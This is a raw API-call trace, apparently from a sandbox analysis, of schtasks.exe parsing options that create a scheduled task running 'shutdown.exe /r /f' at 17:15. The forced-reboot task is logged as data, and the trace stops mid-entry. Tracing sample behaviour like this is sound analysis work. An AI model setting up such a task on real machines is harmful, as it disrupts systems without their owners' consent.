[0038.814] lstrlenW (lpString="|TR|") returned 4 [0038.814] StrStrIW (lpFirst="|showsid|", lpSrch="|TR|") returned 0x0 [0038.814] SetLastError (dwErrCode=0x490) [0038.814] SetLastError (dwErrCode=0x490) [0038.814] SetLastError (dwErrCode=0x0) [0038.814] lstrlenW (lpString="/TR") returned 3 [0038.814] StrChrIW (lpStart="/TR", wMatch=0x3a) returned 0x0 [0038.814] SetLastError (dwErrCode=0x490) [0038.814] SetLastError (dwErrCode=0x0) [0038.814] lstrlenW (lpString="/TR") returned 3 [0038.814] SetLastError (dwErrCode=0x0) [0038.814] SetLastError (dwErrCode=0x0) [0038.814] lstrlenW (lpString="C:\\Windows\\system32\\shutdown.exe /r /f") returned 38 [0038.814] lstrlenW (lpString="-/") returned 2 [0038.814] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0038.814] SetLastError (dwErrCode=0x490) [0038.814] SetLastError (dwErrCode=0x490) [0038.815] SetLastError (dwErrCode=0x0) [0038.815] lstrlenW (lpString="C:\\Windows\\system32\\shutdown.exe /r /f") returned 38 [0038.815] StrChrIW (lpStart="C:\\Windows\\system32\\shutdown.exe /r /f", wMatch=0x3a) returned=":\\Windows\\system32\\shutdown.exe /r /f" [0038.815] lstrlenW (lpString="C:\\Windows\\system32\\shutdown.exe /r /f") returned 38 [0038.815] _memicmp (_Buf1=0x5a4c30, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.815] _memicmp (_Buf1=0x5a4c60, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.815] SetLastError (dwErrCode=0x7a) [0038.815] SetLastError (dwErrCode=0x0) [0038.815] SetLastError (dwErrCode=0x0) [0038.815] lstrlenW (lpString="C") returned 1 [0038.815] SetLastError (dwErrCode=0x490) [0038.815] SetLastError (dwErrCode=0x0) [0038.815] lstrlenW (lpString="C:\\Windows\\system32\\shutdown.exe /r /f") returned 38 [0038.815] SetLastError (dwErrCode=0x0) [0038.815] SetLastError (dwErrCode=0x0) [0038.815] lstrlenW (lpString="/ST") returned 3 [0038.816] lstrlenW (lpString="-/") returned 2 [0038.816] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0038.816] lstrlenW (lpString="?") returned 1 [0038.816] lstrlenW (lpString="?") returned 1 [0038.816] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.816] lstrlenW (lpString="ST") returned 2 [0038.816] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.816] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|?|") returned 3 [0038.816] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|ST|") returned 4 [0038.816] lstrlenW (lpString="|?|") returned 3 [0038.816] lstrlenW (lpString="|ST|") returned 4 [0038.816] SetLastError (dwErrCode=0x490) [0038.816] lstrlenW (lpString="create") returned 6 [0038.816] lstrlenW (lpString="create") returned 6 [0038.816] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.816] lstrlenW (lpString="ST") returned 2 [0038.816] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.816] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|create|") returned 8 [0038.817] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|ST|") returned 4 [0038.817] lstrlenW (lpString="|create|") returned 8 [0038.817] lstrlenW (lpString="|ST|") returned 4 [0038.817] StrStrIW (lpFirst="|create|", lpSrch="|ST|") returned 0x0 [0038.817] SetLastError (dwErrCode=0x490) [0038.817] lstrlenW (lpString="delete") returned 6 [0038.817] lstrlenW (lpString="delete") returned 6 [0038.817] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.817] lstrlenW (lpString="ST") returned 2 [0038.817] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.817] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|delete|") returned 8 [0038.817] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|ST|") returned 4 [0038.817] lstrlenW (lpString="|delete|") returned 8 [0038.817] lstrlenW (lpString="|ST|") returned 4 [0038.817] StrStrIW (lpFirst="|delete|", lpSrch="|ST|") returned 0x0 [0038.817] SetLastError (dwErrCode=0x490) [0038.817] lstrlenW (lpString="query") returned 5 [0038.817] lstrlenW (lpString="query") returned 5 [0038.817] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.818] lstrlenW (lpString="ST") returned 2 [0038.818] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.818] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x8, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|query|") returned 7 [0038.818] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|ST|") returned 4 [0038.818] lstrlenW (lpString="|query|") returned 7 [0038.818] lstrlenW (lpString="|ST|") returned 4 [0038.818] StrStrIW (lpFirst="|query|", lpSrch="|ST|") returned 0x0 [0038.818] SetLastError (dwErrCode=0x490) [0038.818] lstrlenW (lpString="change") returned 6 [0038.818] lstrlenW (lpString="change") returned 6 [0038.818] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.818] lstrlenW (lpString="ST") returned 2 [0038.818] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.818] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|change|") returned 8 [0038.818] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|ST|") returned 4 [0038.818] lstrlenW (lpString="|change|") returned 8 [0038.818] lstrlenW (lpString="|ST|") returned 4 [0038.818] StrStrIW (lpFirst="|change|", lpSrch="|ST|") returned 0x0 [0038.818] SetLastError (dwErrCode=0x490) [0038.818] lstrlenW (lpString="run") returned 3 [0038.819] lstrlenW (lpString="run") returned 3 [0038.819] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.819] lstrlenW (lpString="ST") returned 2 [0038.819] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.819] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|run|") returned 5 [0038.819] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|ST|") returned 4 [0038.819] lstrlenW (lpString="|run|") returned 5 [0038.819] lstrlenW (lpString="|ST|") returned 4 [0038.819] StrStrIW (lpFirst="|run|", lpSrch="|ST|") returned 0x0 [0038.819] SetLastError (dwErrCode=0x490) [0038.819] lstrlenW (lpString="end") returned 3 [0038.819] lstrlenW (lpString="end") returned 3 [0038.819] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.819] lstrlenW (lpString="ST") returned 2 [0038.819] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.819] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|end|") returned 5 [0038.819] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|ST|") returned 4 [0038.819] lstrlenW (lpString="|end|") returned 5 [0038.819] lstrlenW (lpString="|ST|") returned 4 [0038.820] StrStrIW (lpFirst="|end|", lpSrch="|ST|") returned 0x0 [0038.820] SetLastError (dwErrCode=0x490) [0038.820] lstrlenW (lpString="showsid") returned 7 [0038.820] lstrlenW (lpString="showsid") returned 7 [0038.820] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.820] lstrlenW (lpString="ST") returned 2 [0038.820] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.820] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0xa, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|showsid|") returned 9 [0038.820] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|ST|") returned 4 [0038.820] lstrlenW (lpString="|showsid|") returned 9 [0038.820] lstrlenW (lpString="|ST|") returned 4 [0038.820] StrStrIW (lpFirst="|showsid|", lpSrch="|ST|") returned 0x0 [0038.820] SetLastError (dwErrCode=0x490) [0038.820] SetLastError (dwErrCode=0x490) [0038.820] SetLastError (dwErrCode=0x0) [0038.820] lstrlenW (lpString="/ST") returned 3 [0038.820] StrChrIW (lpStart="/ST", wMatch=0x3a) returned 0x0 [0038.820] SetLastError (dwErrCode=0x490) [0038.820] SetLastError (dwErrCode=0x0) [0038.820] lstrlenW (lpString="/ST") returned 3 [0038.821] SetLastError (dwErrCode=0x0) [0038.821] SetLastError (dwErrCode=0x0) [0038.821] lstrlenW (lpString="17:15") returned 5 [0038.821] lstrlenW (lpString="-/") returned 2 [0038.821] StrChrIW (lpStart="-/", wMatch=0x31) returned 0x0 [0038.821] SetLastError (dwErrCode=0x490) [0038.821] SetLastError (dwErrCode=0x490) [0038.821] SetLastError (dwErrCode=0x0) [0038.821] lstrlenW (lpString="17:15") returned 5 [0038.821] StrChrIW (lpStart="17:15", wMatch=0x3a) returned=":15" [0038.821] lstrlenW (lpString="17:15") returned 5 [0038.821] _memicmp (_Buf1=0x5a4c30, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.821] _memicmp (_Buf1=0x5a4c60, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.821] SetLastError (dwErrCode=0x7a) [0038.821] SetLastError (dwErrCode=0x0) [0038.821] SetLastError (dwErrCode=0x0) [0038.821] lstrlenW (lpString="17") returned 2 [0038.821] lstrlenW (lpString="-/") returned 2 [0038.822] StrChrIW (lpStart="-/", wMatch=0x31) returned 0x0 [0038.822] SetLastError (dwErrCode=0x490) [0038.822] SetLastError (dwErrCode=0x490) [0038.822] SetLastError (dwErrCode=0x0) [0038.822] lstrlenW (lpString="17:15") returned 5 [0038.822] SetLastError (dwErrCode=0x0) [0038.825] SetLastError (dwErrCode=0x0) [0038.825] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0038.825] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0038.825] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0038.825] VerifyVersionInfoW (in: lpVersionInformation=0x18cb10, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x18cb10) returned 1 [0038.825] SetLastError (dwErrCode=0x0) [0038.825] lstrlenW (lpString="create") returned 6 [0038.825] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0 [0038.825] SetLastError (dwErrCode=0x490) [0038.825] SetLastError (dwErrCode=0x0) [0038.825] lstrlenW (lpString="create") returned 6 [0038.825] _memicmp (_Buf1=0x59f020, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.825] SetLastError (dwErrCode=0x0) [0038.825] _memicmp (_Buf1=0x5a4b58, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.825] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5a59d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe") returned 0x20 [0038.825] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0038.826] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x5a5be0 | out: lpData=0x5a5be0) returned 1 [0038.826] VerQueryValueW (in: pBlock=0x5a5be0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18cc18, puLen=0x18cc1c | out: lplpBuffer=0x18cc18*=0x5a5f7c, puLen=0x18cc1c) returned 1 [0038.826] _memicmp (_Buf1=0x5a4b58, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.826] _vsnwprintf (in: _Buffer=0x5a59d0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x18cc00 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0038.826] VerQueryValueW (in: pBlock=0x5a5be0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x18cc28, puLen=0x18cc24 | out: lplpBuffer=0x18cc28*=0x5a5da8, puLen=0x18cc24) returned 1 [0038.826] lstrlenW (lpString="schtasks.exe") returned 12 [0038.826] lstrlenW (lpString="schtasks.exe") returned 12 [0038.826] lstrlenW (lpString=".EXE") returned 4 [0038.827] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0038.827] lstrlenW (lpString="schtasks.exe") returned 12 [0038.827] lstrlenW (lpString=".EXE") returned 4 [0038.827] lstrlenW (lpString="schtasks") returned 8 [0038.827] lstrlenW (lpString="/create") returned 7 [0038.827] _memicmp (_Buf1=0x5a4b58, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.827] _vsnwprintf (in: _Buffer=0x5a59d0, _BufferCount=0x19, _Format="%s %s", _ArgList=0x18cc00 | out: _Buffer="schtasks /create") returned 16 [0038.827] _memicmp (_Buf1=0x5a4bb8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.827] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.827] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0038.827] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0038.827] _vsnwprintf (in: _Buffer=0x5a65c0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x18cc04 | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37 [0038.827] SetLastError (dwErrCode=0x0) [0038.828] GetThreadLocale () returned 0x409 [0038.828] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.828] lstrlenW (lpString="create") returned 6 [0038.828] GetThreadLocale () returned 0x409 [0038.828] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.828] lstrlenW (lpString="?") returned 1 [0038.828] GetThreadLocale () returned 0x409 [0038.828] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.828] lstrlenW (lpString="s") returned 1 [0038.828] GetThreadLocale () returned 0x409 [0038.828] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.828] lstrlenW (lpString="u") returned 1 [0038.828] GetThreadLocale () returned 0x409 [0038.828] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.828] lstrlenW (lpString="p") returned 1 [0038.828] GetThreadLocale () returned 0x409 [0038.828] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.828] lstrlenW (lpString="ru") returned 2 [0038.828] GetThreadLocale () returned 0x409 [0038.828] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.828] lstrlenW (lpString="rp") returned 2 [0038.828] GetThreadLocale () returned 0x409 [0038.829] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.829] lstrlenW (lpString="sc") returned 2 [0038.829] GetThreadLocale () returned 0x409 [0038.829] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.829] lstrlenW (lpString="mo") returned 2 [0038.829] GetThreadLocale () returned 0x409 [0038.829] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.829] lstrlenW (lpString="d") returned 1 [0038.829] GetThreadLocale () returned 0x409 [0038.829] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.829] lstrlenW (lpString="m") returned 1 [0038.829] GetThreadLocale () returned 0x409 [0038.829] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.829] lstrlenW (lpString="i") returned 1 [0038.829] GetThreadLocale () returned 0x409 [0038.829] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.829] lstrlenW (lpString="tn") returned 2 [0038.829] GetThreadLocale () returned 0x409 [0038.829] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.829] lstrlenW (lpString="tr") returned 2 [0038.829] GetThreadLocale () returned 0x409 [0038.829] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.830] lstrlenW (lpString="st") returned 2 [0038.830] GetThreadLocale () returned 0x409 [0038.830] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.830] lstrlenW (lpString="sd") returned 2 [0038.830] GetThreadLocale () returned 0x409 [0038.830] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.830] lstrlenW (lpString="ed") returned 2 [0038.830] GetThreadLocale () returned 0x409 [0038.830] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.830] lstrlenW (lpString="it") returned 2 [0038.830] GetThreadLocale () returned 0x409 [0038.830] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.830] lstrlenW (lpString="et") returned 2 [0038.830] GetThreadLocale () returned 0x409 [0038.830] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.830] lstrlenW (lpString="k") returned 1 [0038.830] GetThreadLocale () returned 0x409 [0038.830] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.830] lstrlenW (lpString="du") returned 2 [0038.830] GetThreadLocale () returned 0x409 [0038.830] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.830] lstrlenW (lpString="ri") returned 2 [0038.831] GetThreadLocale () returned 0x409 [0038.831] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.831] lstrlenW (lpString="z") returned 1 [0038.831] GetThreadLocale () returned 0x409 [0038.831] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.831] lstrlenW (lpString="f") returned 1 [0038.831] GetThreadLocale () returned 0x409 [0038.831] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.831] lstrlenW (lpString="v1") returned 2 [0038.831] GetThreadLocale () returned 0x409 [0038.831] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.831] lstrlenW (lpString="xml") returned 3 [0038.831] GetThreadLocale () returned 0x409 [0038.831] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.831] lstrlenW (lpString="ec") returned 2 [0038.831] GetThreadLocale () returned 0x409 [0038.831] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.831] lstrlenW (lpString="rl") returned 2 [0038.831] GetThreadLocale () returned 0x409 [0038.831] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.831] lstrlenW (lpString="delay") returned 5 [0038.831] GetThreadLocale () returned 0x409 [0038.832] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.832] lstrlenW (lpString="np") returned 2 [0038.832] SetLastError (dwErrCode=0x0) [0038.832] SetLastError (dwErrCode=0x0) [0038.832] lstrlenW (lpString="/Create") returned 7 [0038.832] lstrlenW (lpString="-/") returned 2 [0038.832] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0038.832] lstrlenW (lpString="create") returned 6 [0038.832] lstrlenW (lpString="create") returned 6 [0038.832] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.832] lstrlenW (lpString="Create") returned 6 [0038.832] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.832] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|create|") returned 8 [0038.832] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|Create|") returned 8 [0038.832] lstrlenW (lpString="|create|") returned 8 [0038.832] lstrlenW (lpString="|Create|") returned 8 [0038.832] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|" [0038.832] SetLastError (dwErrCode=0x0) [0038.832] SetLastError (dwErrCode=0x0) [0038.832] SetLastError (dwErrCode=0x0) [0038.833] lstrlenW (lpString="/SC") returned 3 [0038.833] lstrlenW (lpString="-/") returned 2 [0038.833] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0038.833] lstrlenW (lpString="create") returned 6 [0038.833] lstrlenW (lpString="create") returned 6 [0038.833] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.833] lstrlenW (lpString="SC") returned 2 [0038.833] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.833] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|create|") returned 8 [0038.833] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|SC|") returned 4 [0038.833] lstrlenW (lpString="|create|") returned 8 [0038.833] lstrlenW (lpString="|SC|") returned 4 [0038.833] StrStrIW (lpFirst="|create|", lpSrch="|SC|") returned 0x0 [0038.833] SetLastError (dwErrCode=0x490) [0038.833] lstrlenW (lpString="?") returned 1 [0038.833] lstrlenW (lpString="?") returned 1 [0038.833] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.833] lstrlenW (lpString="SC") returned 2 [0038.833] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.833] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|?|") returned 3 [0038.834] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|SC|") returned 4 [0038.834] lstrlenW (lpString="|?|") returned 3 [0038.834] lstrlenW (lpString="|SC|") returned 4 [0038.834] SetLastError (dwErrCode=0x490) [0038.834] lstrlenW (lpString="s") returned 1 [0038.834] lstrlenW (lpString="s") returned 1 [0038.834] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.834] lstrlenW (lpString="SC") returned 2 [0038.834] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.834] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|s|") returned 3 [0038.834] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|SC|") returned 4 [0038.834] lstrlenW (lpString="|s|") returned 3 [0038.834] lstrlenW (lpString="|SC|") returned 4 [0038.834] SetLastError (dwErrCode=0x490) [0038.834] lstrlenW (lpString="u") returned 1 [0038.834] lstrlenW (lpString="u") returned 1 [0038.834] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.834] lstrlenW (lpString="SC") returned 2 [0038.834] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.834] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|u|") returned 3 [0038.835] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|SC|") returned 4 [0038.835] lstrlenW (lpString="|u|") returned 3 [0038.835] lstrlenW (lpString="|SC|") returned 4 [0038.835] SetLastError (dwErrCode=0x490) [0038.835] lstrlenW (lpString="p") returned 1 [0038.835] lstrlenW (lpString="p") returned 1 [0038.835] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.835] lstrlenW (lpString="SC") returned 2 [0038.835] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.835] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|p|") returned 3 [0038.835] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|SC|") returned 4 [0038.835] lstrlenW (lpString="|p|") returned 3 [0038.835] lstrlenW (lpString="|SC|") returned 4 [0038.835] SetLastError (dwErrCode=0x490) [0038.835] lstrlenW (lpString="ru") returned 2 [0038.835] lstrlenW (lpString="ru") returned 2 [0038.835] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.835] lstrlenW (lpString="SC") returned 2 [0038.835] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.835] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|ru|") returned 4 [0038.836] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|SC|") returned 4 [0038.836] lstrlenW (lpString="|ru|") returned 4 [0038.836] lstrlenW (lpString="|SC|") returned 4 [0038.836] StrStrIW (lpFirst="|ru|", lpSrch="|SC|") returned 0x0 [0038.836] SetLastError (dwErrCode=0x490) [0038.836] lstrlenW (lpString="rp") returned 2 [0038.836] lstrlenW (lpString="rp") returned 2 [0038.836] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.836] lstrlenW (lpString="SC") returned 2 [0038.837] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.837] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: 